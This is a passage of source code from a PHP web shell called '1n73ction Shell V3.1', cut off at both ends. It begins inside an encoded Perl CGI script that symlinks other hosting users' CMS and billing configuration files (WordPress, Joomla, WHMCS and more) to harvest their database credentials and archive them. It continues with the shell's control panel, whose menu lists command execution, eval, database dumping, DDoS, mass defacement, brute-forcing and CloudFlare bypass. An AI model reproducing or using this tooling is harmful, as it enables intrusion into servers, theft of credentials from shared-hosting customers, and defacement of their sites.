sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7\'; \r\n?>\r\n<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>\r\n<script type="text/javascript">\r\nfunction tukar(lama,baru){\r\n\tdocument.getElementById(lama).style.display = \'none\';\r\n\tdocument.getElementById(baru).style.display = \'block\';\r\n}\r\n</script>\r\n<style type="text/css">\r\nbody{\r\n\tbackground:#000000;;\r\n}\r\na {\r\ntext-decoration:none;\r\n}\r\na:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n*{\r\n\tfont-size:11px;\r\n\tfont-family:Tahoma,Verdana,Arial;\r\n\tcolor:#00ff00;\r\n}\r\n#menu{\r\n\tbackground:#111111;\r\n\tmargin:8px 2px 4px 2px;\r\n}\r\n#menu a{\r\n\tpadding:4px 18px;\r\n\tmargin:0;\r\n\tbackground:#222222;\r\n\ttext-decoration:none;\r\n\tletter-spacing:2px;\r\n\t-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;\r\n}\r\n#menu a:hover{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\n\tborder-top:1px solid #333333;\r\n}\r\n.tabnet{\r\n\tmargin:15px auto 0 auto;\r\n\tborder: 1px solid #333333;\r\n}\r\n.main {\r\n\twidth:100%;\r\n}\r\n.gaya {\r\n\tcolor: #00ff00;\r\n}\r\n.inputz{\r\n\tbackground:#111111;\r\n\tborder:0;\r\n\tpadding:2px;\r\n\tborder-bottom:1px solid #222222;\r\n\tborder-top:1px solid #222222;\r\n}\r\n.inputzbut{\r\n\tbackground:#111111;\r\n\tcolor:#00ff00;\r\n\tmargin:0 4px;\r\n\tborder:1px solid #444444;\r\n\r\n}\r\n.inputz:hover, .inputzbut:hover{\r\n\tborder-bottom:1px solid #00ff00;\r\n\tborder-top:1px solid #00ff00;\r\n}\r\n.output {\r\n\tmargin:auto;\r\n\tborder:1px solid #00ff00;\r\n\twidth:100%;\r\n\theight:400px;\r\n\tbackground:#000000;\r\n\tpadding:0 2px;\r\n}\r\n.cmdbox{\r\n\twidth:100%;\r\n}\r\n.head_info{\r\n\tpadding: 0 4px;\r\n}\r\n.jaya{ font-family: ;}\r\n\r\n.b374k{\r\n\tfont-size:30px;\r\n\tpadding:0;\r\n\tcolor:#444444;\r\n}\r\n.b374k_tbl{\r\n\ttext-align:center;\r\n\tmargin:0 4px 0 0;\r\n\tpadding:0 4px 0 0;\r\n\tborder-right:1px solid #333333;\r\n}\r\n.phpinfo table{\r\n\twidth:100%;\r\n\tpadding:0 0 0 0;\r\n}\r\n.phpinfo td{\r\n\tbackground:#111111;\r\n\tcolor:#cccccc;\r\npadding:6px 8px;;\r\n}\r\n.phpinfo th, th{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\nfont-weight:normal;\r\n}\r\n.phpinfo h2, .phpinfo h2 a{\r\n\ttext-align:center;\r\n\tfont-size:16px;\r\n\tpadding:0;\r\n\tmargin:30px 0 0 0;\r\n\tbackground:#222222;\r\n\tpadding:4px 0;\r\n}\r\n.explore{\r\nwidth:100%;\r\n}\r\n.explore a {\r\ntext-decoration:none;\r\n}\r\n.explore td{\r\nborder-bottom:1px solid #333333;\r\npadding:0 8px;\r\nline-height:24px;\r\n}\r\n.explore th{\r\npadding:3px 8px;\r\nfont-weight:normal;\r\n}\r\n.explore th:hover , .phpinfo th:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n.explore tr:hover{\r\nbackground:#111111;\r\n}\r\n.viewfile{\r\nbackground:#EDECEB;\r\ncolor:#000000;\r\nmargin:4px 2px;\r\npadding:8px;\r\n}\r\n.sembunyi{\r\ndisplay:none;\r\npadding:0;margin:0;\r\n}\r\n\r\n</style></head>\r\n<script language=\'javascript\'>\r\nif (document.all||document.getElementById){\r\nvar thetitle=document.title\r\ndocument.title=\'\'\r\n}\r\nvar data="Us3 Y0ur br41n biTch ! ! !";\r\nvar done=1;\r\nfunction statusIn(text){\r\ndecrypt(text,22,22);\r\n}\r\nfunction statusOut(){\r\nself.status=\'\';\r\ndone=1;\r\n}\r\nfunction decrypt(text, max, delay){\r\nif (done){\r\ndone = 0;\r\nrantit(text, max, delay, 0, max);\r\n} \r\n}\r\nfunction rantit(text, runs_left, delay, charvar, max){\r\nif (!done){\r\nruns_left = runs_left - 1;\r\nvar status = text.substring(0,charvar);\r\nfor(var current_char = charvar; current_char < text.length; current_char++){\r\nstatus += data.charAt(Math.round(Math.random()*data.length));\r\n}\r\ndocument.title = status;\r\nvar rerun = "rantit(\'" + text + "\'," + runs_left + "," + delay + "," + charvar + "," + max + ");"\r\nvar new_char = charvar + 1;\r\nvar next_char = "rantit(\'" + text + "\'," + max + "," + delay + "," + new_char + "," + max + ");"\r\nif(runs_left > 0){\r\nsetTimeout(rerun, delay);\r\n}\r\nelse{\r\nif (charvar < text.length){\r\nsetTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));\r\n}\r\nelse\r\n{\r\ndone = 1;\r\n}\r\n}\r\n}\r\n}\r\nif (document.all||document.getElementById)\r\nstatusIn(thetitle)\r\n</script>\r\n\r\n<body onLoad="document.getElementById(\'cmd\').focus();">\r\n<div class="main">\r\n<!-- head info start here -->\r\n<div class="head_info">\r\n<table ><tr>\r\n<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>\r\n<td><?php echo $buff; ?></td>\r\n</tr></table>\r\n</div>\r\n<!-- head info end here -->\r\n<!-- menu start -->\r\n<center><div id="menu">\r\n<a href="?<?php echo "y=".$pwd; ?>"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=\' height="18" width="34"></a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>\r\n<a href="?<?php echo "y=".$pwd; 